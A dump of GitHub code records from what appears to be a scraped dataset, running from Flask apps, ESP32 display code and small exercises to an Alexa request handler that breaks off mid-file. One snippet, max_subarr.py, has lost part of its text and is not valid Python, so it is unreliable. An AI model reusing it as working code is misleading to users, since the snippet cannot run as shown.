jsonfile['chains'][1]['endpoint'] = endpoint.node_endpoint\n for contract in contracts.values():\n if contract.type == 'erc20' or contract.type == 'erc721':\n # The config file does not contain the erc20/721 endpoint\n # so we skip them\n pass\n else:\n jsonfile['chains'][1]['opts'][contract.type] = contract.address\n f.seek(0)\n f.truncate()\n json.dump(jsonfile, f, indent=4)\n self.start_relay()\n","repo_name":"NorwegianGoat/bc_connector","sub_path":"scripts/utils/cb_wrapper.py","file_name":"cb_wrapper.py","file_ext":"py","file_size_in_byte":10531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30360048851","text":"from flask import (\n render_template,\n request,\n jsonify,\n make_response,\n Blueprint,\n redirect,\n url_for\n)\nfrom .data_worker import (\n read_df,\n load_orders,\n load_delivery,\n load_sales,\n calculate_balance,\n orders_worker\n)\n\n# здесь создаем blueprint. Его потом подключаем в файле manage.py в корне\n# название senor, префикс /senor, т.е. в приложении все роуты к нему будут обрабатываться как /senor/*\n# , но в роутах этого модуля префикс опускается\nsims = Blueprint('sims', __name__, url_prefix='/sims', static_folder='static', template_folder='templates')\n\n\n# отрисовываю страницу, она доступна по ссылке http://localhost:5000/sims/\n@sims.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'GET':\n orders_info, delivery_info, sales_info = get_values_for_sims_page()\n return render_template('sims.html', title='Сим-карты СберМобайл',\n orders_info=orders_info,\n delivery_info=delivery_info,\n sales_info=sales_info)\n\n if request.form.get('orders') == 'on':\n print('запускаю загрузку заявок')\n load_orders(path_to_file = r'\\\\Braga101\\Vol2\\SUDR_PCP_BR\\SIMS\\sources\\orders.csv')\n\n if request.form.get('delivery') == 'on':\n print('запускаю загрузку поставок')\n load_delivery(delivery_type=0, path_to_file=r'\\\\Braga101\\Vol2\\SUDR_PCP_BR\\SIMS\\sources\\delivery.xlsx')\n load_delivery(delivery_type=1, path_to_file=r'\\\\Braga101\\Vol2\\SUDR_PCP_BR\\SIMS\\sources\\report.xls')\n\n if request.form.get('sales') == 'on':\n print('запускаю загрузку продаж')\n load_sales()\n\n if request.form.get('balances') == 'on':\n print('запускаю загрузку остатков ВСП')\n calculate_balance(save_db=True, check_last_balance=False)\n\n if request.form.get('orders_worker') == 'on':\n print('запускаю обновление check_orders')\n orders_worker()\n\n return redirect(url_for('sims.index'))\n\n\n# функция для отлавливания запросов со страницы, те которые отправляются функцией fetch\n@sims.route('/run_script', methods=['POST'])\ndef run_script():\n # получаем содержимое запроса\n req = request.get_json()\n\n # содержимое запроса используется в запуске функции. Функцию нужно импортировать и запустить ниже\n # your code is here\n\n # формируем ответ для отрисовки на странице\n res = make_response(jsonify('Все ок'), 200)\n\n return res\n\n\ndef get_values_for_sims_page():\n orders_info = read_df(\"\"\"\n select \n sum(case when dttm >= date('now', 'start of month') then 1 else 0 end) orders_current,\n sum(case when dttm >= date('now', 'start of month', '-1 month') and dttm < date('now', 'start of month') then 1 else 0 end) orders_prev,\n strftime('%d.%m.%Y', max(dttm)) dt_order\n from sims_orders\n \"\"\")\n orders_info = list(orders_info.values[0])\n delivery_info = read_df(\"\"\"\n select \n sum(case when dt >= date('now', 'start of month') then 1 else 0 end) delivery_current,\n sum(case when dt >= date('now', 'start of month', '-1 month') and dt < date('now', 'start of month') then 1 else 0 end) delivery_prev,\n strftime('%d.%m.%Y', max(dt)) dt_delivery\n from sims_delivery\n \"\"\")\n delivery_info = list(delivery_info.values[0])\n\n sales_info = read_df(\"\"\"\n select \n strftime('%d.%m.%Y', max(dt)) dt_sales\n from sims_expense\n \"\"\")\n sales_info = list(sales_info.values[0])\n\n return orders_info, delivery_info, sales_info","repo_name":"xandrzoll/portal_pcp","sub_path":"apps/sims/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39529693853","text":"a=list(input().strip().split())\na=[int(i) for i in a]\nmaxsof=0\nmaxend=0\nmaxtot=0\nfor i in range(len(a)):\n maxsof+=a[i]\n if maxsof<0:\n maxsof=0\n if maxend=0:\n maxtot+=a[i]\nprint(maxend,maxtot)","repo_name":"Shivam60/hackerrank-questions","sub_path":"max_subarr.py","file_name":"max_subarr.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17455717856","text":"from chainer.backends import cuda\n\n\ndef sample_without_replacement(p_log):\n \"\"\"\n Samples a permutation with log-probabilities\n\n :param p_log: The log-probabilities (each row's exp(log_p) needs to sum up\n to one)\n :type p_log: chainer.Variable\n\n :param rng: The random number generator (default is to use global random\n number generator in either cupy or numpy)\n :type rng: numpy.random.RandomState|cupy.random.RandomState|None\n\n :return: A random permutation, sampled without replacement with proportional\n probabilities\n :rtype: chainer.Variable\n \"\"\"\n xp = cuda.get_array_module(p_log)\n\n # This uses reservoir sampling, which comes down to doing\n # Uniform(0, 1) ^ (1 / p) and then sorting by the resulting values. The\n # following implementation is a numerically stable variant that operates in\n # log-space and uses GPU-accelerated operations.\n u = xp.random.uniform(0.0, 1.0, p_log.shape)\n r = xp.log(-xp.log(u)) - p_log.data\n s = xp.argsort(r, axis=1)\n return s\n","repo_name":"rjagerman/chainerltr","sub_path":"chainerltr/functions/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"21970767280","text":"#Piedra papel o tijera\nimport random\nplayerName = input()\nplayerNumber = int(input())\ncomputerName = input()\ncomputerNumber = int(input())\n\n \n\ndef despliega_tiro(jugador, tiro):\n if tiro == 1:\n print(jugador + \" tiro Piedra\")\n elif tiro == 2:\n print(jugador + \" tiro Papel\")\n else:\n print(jugador + \" tiro Tijera\")\n \ndef piedra_papel_tijera(tJ, tC):\n despliega_tiro(playerName, playerNumber)\n despliega_tiro(computerName, computerNumber)\n \n if (tJ == 1 and tC == 3) or (tJ == 2 and tC == 1) or (tJ == 3 and tC == 2):\n print(\"ganaste\")\n elif tJ == 1 and tC == 2 or (tJ == 2 and tC == 3) or (tJ == 3 and tC == 1):\n print(\"perdiste\")\n elif tJ == tC:\n print('empate')\n else:\n print('enter valid numbers')\n \n \npiedra_papel_tijera(playerNumber, computerNumber) \n \n","repo_name":"Abrahamcepedao/ITC","sub_path":"Semestre1/Pensamiento computacional/archivos py/piedraPapelTijera.py","file_name":"piedraPapelTijera.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3049802149","text":"from datetime import datetime\nfrom image_util import compute_image_hash\nfrom typing import Dict, Optional\n\n\nGALLERY_URL = \"https://www.reddit.com/gallery/\"\nDATETIME_FMT = \"%d/%m/%y %H:%M\"\n\n\nclass FoodPost:\n # Attributes\n # id - the submission ID given by Reddit\n # title - the Post title\n # post_url - the permalink for this post\n # image_url - the url for the associated image of a submission\n def __init__(self, **kwargs):\n self.id = kwargs.get(\"id\")\n self.title = kwargs.get(\"title\")\n self.post_url = kwargs.get(\"permalink\")\n self.image_url = kwargs.get(\"image_url\")\n self.img_hash = kwargs.get(\"img_hash\") # for testing\n self.color = 0xDB5172\n ts = kwargs.get(\"created_utc\")\n if ts is not None and ts > 0:\n self.date_posted = datetime.fromtimestamp(ts)\n else:\n self.date_posted = None\n\n def __str__(self):\n return f\"{self.title} : {self.post_url}\"\n\n def __repr__(self):\n return self.__str__()\n\n # Transforms this FoodPost object into the discord Embed dictionary that\n # should be posted.\n def to_embed(self) -> Dict:\n data = {\n \"title\": FoodPost.truncate(self.title),\n \"description\": self.post_url,\n \"color\": self.color,\n }\n if self.image_url is not None and self.image_url != \"\":\n data[\"image\"] = {\"url\": self.image_url}\n return data\n\n def image_hash(self) -> Optional[int]:\n if self.img_hash is None:\n self.img_hash = compute_image_hash(self.image_url)\n return self.img_hash\n\n def to_json(self) -> Dict:\n \"\"\"\n Transform the submission and it's hash into a Python\n dictionary, so that it can be converted into a JSON string\n that gets persisted in the Redis cache as part of an array.\n\n Example:\n {\n \"id\": \"foo-bar-baz\",\n \"hash\": \"1234567890\",\n \"title\" \"Something here\",\n \"date\": \"2022-01-01\",\n }\n @param img_hash the hash of the byte array of the Image from PIL\n @return dictionary to be persisted into the Redis cache.\n \"\"\"\n return {\n \"id\": self.id,\n \"hash\": str(self.image_hash()),\n \"title\": self.title,\n \"date\": self.date_posted.strftime(DATETIME_FMT),\n }\n\n # Given a Reddit submission title, truncate the title if it's too long\n # https://github.com/SaxyPandaBear/discord-food-bot/issues/28\n # If the title is not too long, return the input unchanged\n @staticmethod\n def truncate(title: str) -> str:\n if title is None:\n return None\n\n # truncate with an ellipsis, so we need some leeway\n if len(title) > 256:\n return title[:253] + \"...\" # take first 253 characters\n return title\n\n # Take a Reddit submission object, and transform that into a FoodPost\n @staticmethod\n def from_submission(submission):\n sub_id = submission.id\n url = FoodPost.derive_image_url(submission)\n # permalink does not give the full URL, so build it instead.\n permalink = f\"https://www.reddit.com{submission.permalink}\"\n title = submission.title\n created_utc = submission.created_utc\n return FoodPost(\n id=sub_id,\n title=title,\n image_url=url,\n permalink=permalink,\n created_utc=created_utc,\n )\n\n @staticmethod\n def derive_image_url(submission) -> Optional[str]:\n \"\"\"\n A submission can point to a gallery instead of a direct link to\n an image. This gallery URL does not render properly on Discord in the\n embed. Have to pick one of the images ourselves, and then use that\n to display in this scenario.\n @param submission The submission object from PRAW\n \"\"\"\n if submission is None or submission.url is None:\n return None\n\n url = submission.url\n if url.startswith(GALLERY_URL):\n # https://github.com/SaxyPandaBear/my-webhooks/issues/4\n # If the submission points to a Reddit gallery, need to pick one\n # of the images in the gallery to render in the Discord embed.\n # The set of images are defined in the \"media_metadata\" attribute\n # of the submission.\n images: Dict = submission.media_metadata\n if images is None or len(images) < 1:\n return None\n # Unsure if ordering is guaranteed, so in order to be\n # deterministic, ensure ordering on our end by sorting.\n ids = sorted(images) # this sorts by key, and only returns keys.\n url = f\"https://i.redd.it/{ids[0]}.jpg\"\n\n query_param_idx = url.find(\"?\")\n if query_param_idx >= 0:\n url = url[:query_param_idx]\n return url\n","repo_name":"SaxyPandaBear/food-pics","sub_path":"food_post.py","file_name":"food_post.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2302463663","text":"import sys\nimport PIL\nfrom PIL import Image\nimport numpy as np\nfrom flask import Flask\n\napp = Flask('__main__')\nsys.setrecursionlimit(50000)\n\ndef thinning(image):\n np.set_printoptions(threshold=np.nan)\n im = Image.open(app.root_path + '/' + image)\n image = im.load()\n h, w = im.size\n #quantize image to 0 and 1 value\n quantitized_image = np.zeros((w + 2, h + 2), dtype=int)\n for i in range(w):\n for j in range(h):\n rgb_image = image[j, i]\n if(isinstance(rgb_image, int)):\n grayscale = 0\n elif (len(rgb_image) == 4):\n if (rgb_image[3] > 0):\n grayscale = (rgb_image[0] + rgb_image[1] + rgb_image[2]) / 3\n else:\n grayscale = 9999\n else:\n grayscale = (rgb_image[0] + rgb_image[1] + rgb_image[2]) / 3\n\n if(grayscale < 127):\n quantitized_image[i + 1, j + 1] = 1\n \n changing1 = changing2 = 1 # the points to be removed (set as 0) \n while changing1 or changing2: # iterates until no further changes occur in the image\n # Step 1\n changing1 = []\n rows, columns = quantitized_image.shape # x for rows, y for columns\n for x in range(1, rows - 1): # No. of rows\n for y in range(1, columns - 1): # No. of columns\n P2,P3,P4,P5,P6,P7,P8,P9 = n = neighbours(x, y, quantitized_image)\n if (quantitized_image[x][y] == 1 and # Condition 0: Point P1 in the object regions \n 2 <= sum(n) <= 6 and # Condition 1: 2<= N(P1) <= 6\n transitions(n) == 1 and # Condition 2: S(P1)=1 \n P2 * P4 * P6 == 0 and # Condition 3 \n P4 * P6 * P8 == 0): # Condition 4\n changing1.append((x,y))\n for x, y in changing1: \n quantitized_image[x][y] = 0\n # Step 2\n changing2 = []\n for x in range(1, rows - 1):\n for y in range(1, columns - 1):\n P2,P3,P4,P5,P6,P7,P8,P9 = n = neighbours(x, y, quantitized_image)\n if (quantitized_image[x][y] == 1 and # Condition 0\n 2 <= sum(n) <= 6 and # Condition 1\n transitions(n) == 1 and # Condition 2\n P2 * P4 * P8 == 0 and # Condition 3\n P2 * P6 * P8 == 0): # Condition 4\n changing2.append((x,y)) \n for x, y in changing2: \n quantitized_image[x][y] = 0\n\n\n return quantitized_image\n\ndef neighbours(x,y,image):\n \"Return 8-neighbours of image point P1(x,y), in a clockwise order\"\n img = image\n x_1, y_1, x1, y1 = x-1, y-1, x+1, y+1\n return [ img[x_1][y], img[x_1][y1], img[x][y1], img[x1][y1], # P2,P3,P4,P5\n img[x1][y], img[x1][y_1], img[x][y_1], img[x_1][y_1] ] # P6,P7,P8,P9\n\ndef transitions(neighbours):\n \"No. of 0,1 patterns (transitions from 0 to 1) in the ordered sequence\"\n n = neighbours + neighbours[0:1] # P2, P3, ... , P8, P9, P2\n return sum( (n1, n2) == (0, 1) for n1, n2 in zip(n, n[1:]) ) # (P2,P3), (P3,P4), ... , (P8,P9), (P9,P2)","repo_name":"betheazdavida/image-processing-course","sub_path":"5/thinning.py","file_name":"thinning.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33728517958","text":"from errors import InvalidAccountType\n\nclass Account:\n ACC_TYPES = (\"SAVINGS\", \"CREDIT\")\n\n def __init__(self, iban, currency, type) -> None:\n if type not in Account.ACC_TYPES:\n raise InvalidAccountType()\n\n self.iban = iban\n self.currency = currency\n self.type = type\n","repo_name":"CharlieScarver/TU-Introduction-to-Programming","sub_path":"Sem-07/bank-task/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"23207892895","text":"import gdown\nimport tarfile\n\nfrom pathlib import Path\n\nfrom lib.config import DATASET_CHOICE, DATASET_URL\n\n__all__ = [\"run\"]\n\n\ndef run(**kwargs):\n \"\"\"\n Downloads the Drone Deploy Segmentation Dataset.\n\n Uses the following configuration settings:\n - DATASET_CHOICE: dataset to be downloaded\n - DATASET_URL: download url\n \"\"\"\n\n # Download the archive file, if it isn't downloaded already\n filename = Path(f\"downloads/{DATASET_CHOICE}.tar.gz\")\n filename.parent.mkdir(parents=True, exist_ok=True)\n\n if filename.exists():\n print(\n f\"Archive file of dataset '{DATASET_CHOICE}' already exists ('{str(filename)}').\"\n )\n else:\n print(f\"Downloading archive file of dataset '{DATASET_CHOICE}'\")\n gdown.download(DATASET_URL, str(filename), quiet=False)\n\n # Extract the archive file, if it isn't extracted already\n dataset_directory = Path(f\"data/{DATASET_CHOICE}\")\n\n if dataset_directory.exists():\n print(\n f\"Extracted dataset '{DATASET_CHOICE}' already exists ('{str(dataset_directory)}').\"\n )\n else:\n print(f\"Extracting dataset '{DATASET_CHOICE}'...\")\n dataset_directory.mkdir(parents=True, exist_ok=True)\n with tarfile.open(str(filename), \"r:gz\") as tar:\n tar.extractall(str(dataset_directory.parent))\n","repo_name":"kelvindecosta/heimdall","sub_path":"lib/dataset/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12862497311","text":"# Daniel Holmes\n# 2019/9/19\n# routes.py\n# backend to make predictions\n\nfrom flask import request\nfrom app import app\nfrom app.processing import pipeline\n\n\n@app.route('/classify/group', methods=['POST'])\ndef classify_one():\n \"\"\" classify one group of text \"\"\"\n group = request.get_json(force=True)['group']\n sentences, predictions = pipeline(group)\n\n return {\n 'sentences': sentences,\n 'predictions': predictions\n }\n\n\n@app.route('/classify/groups', methods=['POST'])\ndef classify_many():\n \"\"\" classify many groups of text \"\"\"\n groups = request.get_json(force=True)['groups']\n predictions = []\n\n for group in groups:\n sentences, group_predictions = pipeline(group)\n\n predictions.append({\n 'sentences': sentences,\n 'predictions': group_predictions\n })\n\n return {'predictions': predictions}\n","repo_name":"danielholmes839/Get-The-Facts-Out","sub_path":"backend/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25416073552","text":"import time\nt0= time.time()\nimport wifi_esp32\nimport display\n\n# initialize tft display\ntft = display.TFT()\ntft.tft_setspeed(4000000)\ntft.init(tft.ST7789,bgr=False,rot=tft.PORTRAIT, miso=17,backl_pin=4,backl_on=1, mosi=19, clk=18, cs=5, dc=16, color_bits=tft.COLOR_BITS16, splash=False)\ntft.setwin(52,40,240, 320)\n#tft.set_bg(0xff00)\n#tft.clear()\nt1= time.time()\n\nimport page\nt2= time.time()\nfrom lcd import LCD\nt3= time.time()\nimport gpio_esp32\nt4= time.time()\n\nlcd = LCD(False)\nperiod = .1\nsleeptime = time.time()\n\nimport machine, micropython\n#machine.freq(80000000)\n\nvbatt = machine.ADC(34)\nvbatt.atten(3) # only one that works!!\n\ngpio_esp32.init(lcd)\n\nt5= time.time()\nprint ('loaded', t5-t0, ':',t1-t0, t2-t1, t3-t2, t4-t3, t5-t4)\n\nsleepmode = 0\nwhile True:\n import gc\n gc.collect()\n #micropython.mem_info()\n\n v = vbatt.read() * 0.0017728937728937728\n if not lcd.battery_voltage:\n lcd.battery_voltage = v\n lp = .02\n lcd.battery_voltage = (1-lp)*lcd.battery_voltage + lp*v\n\n gpio_esp32.poll(lcd)\n if any(list(map(lambda key : key.count, lcd.keypad))):\n sleeptime = time.time()\n if sleepmode:\n tft.backlight(True)\n if sleepmode > 1:\n machine.freq(240000000)\n sleepmode = 0\n \n t0 = time.time()\n try:\n lcd.poll()\n except Exception as e:\n print('lcd poll failed', e)\n t1 = time.time()\n gpio_esp32.poll(lcd)\n t2 = time.time()\n \n if time.time() - sleeptime > 20:\n #print('sleep blank screen')\n tft.backlight(False)\n #esp.sleep_type(esp.SLEEP_MODEM) # SLEEP_LIGHT\n sleepmode = 1\n\n if time.time() - sleeptime > 60:\n if wifi_esp32.station.isconnected():\n #print('sleep wifi off')\n #wifi_esp32.station.active(False)\n pass\n #machine.freq(80000000)\n sleepmode = 2\n\n #if wifi_esp32.station.isconnected():\n wifi_esp32.poll(lcd.client)\n\n if time.time() - sleeptime > 300:\n print('sleep power down')\n machine.deepsleep()\n\n t3 = time.time()\n dt = t3-t0\n s = period - dt\n if s <= .01:\n s = .01\n #print('sleep ', t1-t0, t2-t1, t3-t2, s*100/(t3-t0+s), '%')\n\n time.sleep(s)\n","repo_name":"FredericGuilbault/pypilot","sub_path":"hat/lcd_esp32.py","file_name":"lcd_esp32.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"5219588516","text":"necesita_calculo = input(\"¿Tienes que hacer alguna conversión, hoy (si / no) :?\")\n\nwhile necesita_calculo == \"si\":\n\n escala_a_convertir = input(\"¿Que quieres conocer, celsius o farenheit?\")\n temoeratura_a_convertir = int(input(\"Cuál es la temperatura que quieres convertir?\"))\n\n if escala_a_convertir == \"celsius\":\n resultado_en_celsius = (temoeratura_a_convertir - 32)/1.8\n print(\"La temperatura en Celsius es {} grados\".format(resultado_en_celsius))\n necesita_calculo = input(\"¿Necesitas otro cálculo?\")\n\n elif escala_a_convertir == \"farenheit\":\n resultado_en_farenheit = (temoeratura_a_convertir *1.8) +32\n print(\"La temperatura en Farenheit es de {} grados\".format(resultado_en_farenheit))\n necesita_calculo = input(\"¿Necesitas otro cálculo?\")\n else:\n print(\"No has introducido bien los datos, mamonazo\")\n\nprint(\"Gracias por usar este convertidor interactivo\")\n","repo_name":"ulric09/mi-primer-programa","sub_path":"Convertidor de Celsius a Farenheit.py","file_name":"Convertidor de Celsius a Farenheit.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72864695526","text":"#!/usr/bin/env python3\n\nprint(\"Please think of a number between 0 and 100!\")\n\nmin = 0\nmax = 100\n\nwhile True:\n guess = (min + max) // 2\n print(\"Is your secret number\", str(guess) + \"?\")\n\n ans = input(\"Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed correctly. \")\n if ans != \"h\" and ans != \"l\" and ans !=\"c\":\n print(\"Sorry, I did not understand your input.\")\n continue\n\n if ans == \"c\":\n print(\"Game over. Your secret number was:\", guess)\n break\n\n elif ans == \"h\":\n max = guess\n\n else:\n min = guess\n","repo_name":"rosaelton/OSSU-02.2-MITx-6.00.1x-Intro-To-CS-using-Python","sub_path":"unit-02/guess-my-number.py","file_name":"guess-my-number.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69855704164","text":"#!/usr/bin/env python3\n\nimport os\nfrom setuptools import setup\n\nbase_dir = os.path.dirname(__file__)\nwith open(os.path.join(base_dir, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='norman',\n version='0.1.0',\n description='AMR Normalization',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/goodmami/norman',\n author='Michael Wayne Goodman',\n author_email='goodman.m.w@gmail.com',\n license='MIT',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Topic :: Scientific/Engineering :: Information Analysis',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Text Processing :: Linguistic',\n 'Topic :: Utilities'\n ],\n keywords='nlp amr semantics graphs',\n py_modules=['norman'],\n setup_requires=['wheel >= 0.31.0'],\n install_requires=[\n 'penman == 0.6.2',\n 'smatch == 1.0.1'\n ]\n)\n","repo_name":"goodmami/norman","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23987210104","text":"from colorama import init, Fore, Style\ninit()\n\nnome_file = \"COM26_bin.txt\" # sostituisci con il binario del file\n\nwith open(\"COM26_analysis.txt\", \"w\") as output:\n with open(nome_file, \"r\") as file:\n blocchi = []\n blocco = \"\"\n while True:\n temp = file.read(1)\n if not temp: break\n blocco += temp\n if blocco.endswith(\"S\"):\n blocchi.append(blocco.replace(\"S\",\"\"))\n blocco = \"\"\n\n for blocco in blocchi:\n # prendo la riga in binario\n data_BIN = blocco.strip() # Rimuove spazi e caratteri di nuova linea\n # ogni 8 caratteri metto uno spazio\n riga_BIN = []\n riga_BYTE = []\n\n for i in range(0, len(data_BIN), 8):\n byte_BIN = data_BIN[i:i+8] \n riga_BIN.append(byte_BIN)\n riga_BYTE.append(''.join(format(b, '02x') for b in (int(byte_BIN, 2).to_bytes(1, \"big\"))))\n \n bns = \"\"\n bys = \"\"\n bts = \"\"\n stampa = []\n k = 0\n for i in range(len(riga_BIN)):\n bns += riga_BIN[i] + \" \"\n bys += riga_BYTE[i] + \" \"\n try: \n if riga_BYTE[i] == \"0a\" or riga_BYTE[i] == \"0d\":\n bts += repr(bytes.fromhex(riga_BYTE[i]).decode(\"ascii\")) + \" \"\n else: bts += bytes.fromhex(riga_BYTE[i]).decode(\"ascii\") + \" \"\n except UnicodeDecodeError as e:\n bts += \"- \"\n k += 1\n if (k == 8):\n stampa.append(bns + \"\\t\" + bys + \"\\t\" + bts)\n bns = \"\"\n bys = \"\"\n bts = \"\"\n k = 0\n \n for j in range(len(stampa)):\n print(stampa[j], file=output)\n\n print(\"\\nFINE BLOCCO\\n \", file=output)\n","repo_name":"lucapada/GPSDataLoggerParser","sub_path":"analyzeStream.py","file_name":"analyzeStream.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73615490084","text":"from typing import Optional, Dict, List\nimport appdaemon.plugins.hass.hassapi as hassapi\nimport helpers\n\n\nclass AlexaAPI(hassapi.Hass):\n \"\"\"AlexaAPI\"\"\"\n def initialize(self):\n \"\"\"App init\"\"\"\n self.register_endpoint(self.api_call, 'alexa')\n self.sessions: Dict[str, Dict] = {}\n\n def api_call(self, data, kwargs):\n \"\"\"Entrypoint of REST call\"\"\"\n self.log('New Alexa API request')\n session_id = data.get('session', {}).get('sessionId', None)\n # Note that the session object is missing in AudioPlayer,\n # VideoApp, or PlaybackController requests\n if not session_id:\n self.log('Request is missing session.sessionId!')\n return {}, 400\n\n # Record the request\n request_data = self.get_request_data_from_json(data)\n if session_id not in self.sessions:\n self.log('New session: %s' % session_id)\n self.sessions[session_id] = {'requests': list()}\n self.sessions[session_id]['requests'].append(request_data)\n\n # Handle request\n return self.handle_request(session_id)\n\n def get_request_data_from_json(self, data):\n \"\"\"Extract the info we need from the data dict. Returns new dict with\n our desired fields\n\n \"\"\"\n # Any error?\n error = data.get('request', {}).get('error', {}).get('message', '')\n\n # Get a proper device name\n device_id = data.get('context',\n {}).get('System',\n {}).get('device',\n {}).get('deviceId',\n '')\n device = self.args.get('devices', {}).get(device_id, 'unknown device')\n # Log the device if not yet known\n if device_id not in self.args.get('devices', {}):\n self.log('Request from device: %s' % device_id)\n\n # The slots for this intent\n slots = {}\n for slot_value in data.get('request', {}).get('intent',\n {}).get('slots',\n {}).values():\n slots[slot_value.get('name')] = {\n 'value': slot_value.get('value'),\n 'resolutions': []\n }\n # Add the 'resolutions' flattened. Let's hope thats enough\n for resolution in slot_value.get('resolutions',\n {}).get('resolutionsPerAuthority',\n []):\n if resolution.get('status', {}).get('code',\n '') != 'ER_SUCCESS_MATCH':\n continue\n for rpa_value in resolution.get('values', []):\n slots[slot_value.get('name')]['resolutions'].append({\n 'id':\n rpa_value.get('value', {}).get('id', ''),\n 'name':\n rpa_value.get('value', {}).get('name', '')\n })\n\n # The intent name. Note some amazon intents are named like AMAZON.Intent\n intent = data.get('request', {}).get('intent', {}).get('name', '')\n confirmation_status = data.get('request',\n {}).get('intent',\n {}).get('confirmationStatus',\n 'NONE')\n return {\n 'type': data.get('request', {}).get('type', ''),\n 'intent': intent,\n 'confirmation_status': confirmation_status,\n 'dialog_state': data.get('request', {}).get('dialogState', ''),\n 'device': device,\n 'slots': slots,\n 'error': error\n }\n\n # pylint: disable=too-many-return-statements,too-many-branches\n def handle_request(self, session_id):\n \"\"\"Handle latest request for `session_id`\"\"\"\n # Get the latest request in the session\n request = self.sessions[session_id]['requests'][-1]\n\n # There are 4 different standard request types we handle\n if request['type'] == 'LaunchRequest':\n self.log('LaunchRequest')\n # Sent when the user invokes your skill without providing\n # a specific intent.\n #\n # https://developer.amazon.com/en-US/docs/alexa/custom-skills/request-types-reference.html#launchrequest\n return self.get_app_response(self.args.get('launchRequestApp', ''),\n 'launchRequest', session_id)\n\n if request['type'] == 'IntentRequest':\n self.log('IntentRequest: %s' % request['intent'])\n # Sent when the user makes a request that corresponds to\n # one of the intents defined in your intent schema.\n #\n # https://developer.amazon.com/en-US/docs/alexa/custom-skills/request-types-reference.html#intentrequest\n if not request['dialog_state']:\n self.log(\n 'Dialog not yet started (or intent has no dialog model, i.e. no multi-turn dialog)'\n )\n # TODO: Not sure how this works. Do we delegate this\n # request to a method in the intent app?\n return self.create_response_dict(shouldEndSession=True), 200\n if request['dialog_state'] == 'STARTED':\n self.log('Dialog started')\n # Dialog started, let's give the app a chance to respond, or we delegate back to Alexa\n try:\n return self.get_app_response(request['intent'],\n 'intentStarted',\n session_id,\n error_exception=True)\n except Exception: # pylint: disable=broad-except\n self.log(\n 'Failed to ask %s for %s. Delegating dialog to Alexa' %\n (request['intent'], 'intentStarted'))\n return self.create_response_dict(\n directives=[{\n 'type': 'Dialog.Delegate',\n 'updatedIntent': None\n }]), 200\n if request['dialog_state'] == 'IN_PROGRESS':\n self.log('Dialog in progress')\n # Dialog started, let's give the app a chance to respond, or we delegate back to Alexa\n try:\n return self.get_app_response(request['intent'],\n 'intentInProgress',\n session_id,\n error_exception=True)\n except Exception: # pylint: disable=broad-except\n self.log(\n 'Failed to ask %s for %s: Delegating dialog to Alexa' %\n (request['intent'], 'intentInProgress'))\n return self.create_response_dict(\n directives=[{\n 'type': 'Dialog.Delegate',\n 'updatedIntent': None\n }]), 200\n if request['dialog_state'] == 'COMPLETED':\n self.log('Dialog completed')\n # COMPLETED can either be because the dialog is really\n # completed in which case we dispatch to the app, or\n # there are dialog confirmation rules in which case\n # dialogState is COMPLETED regardless of whether the\n # user confirmed or denied the entire intent. So we\n # check that the user did not deny the confirmation\n if request['confirmation_status'] == 'DENIED':\n self.log('User denied the intent. Aborting session')\n self.clean_session(session_id)\n return self.create_response_dict(\n shouldEndSession=True), 200\n self.log('Calling user intent app %s' % request['intent'])\n return self.get_app_response(request['intent'],\n 'intentCompleted', session_id)\n\n self.log('Dialog state is %s - this should not happen!' %\n request['dialog_state'])\n return self.create_response_dict(), 200\n\n if request['type'] == 'SessionEndedRequest':\n self.log('SessionEndedRequest')\n # Sent when the current skill session ends for any reason\n # other than your code closing the session.\n #\n # 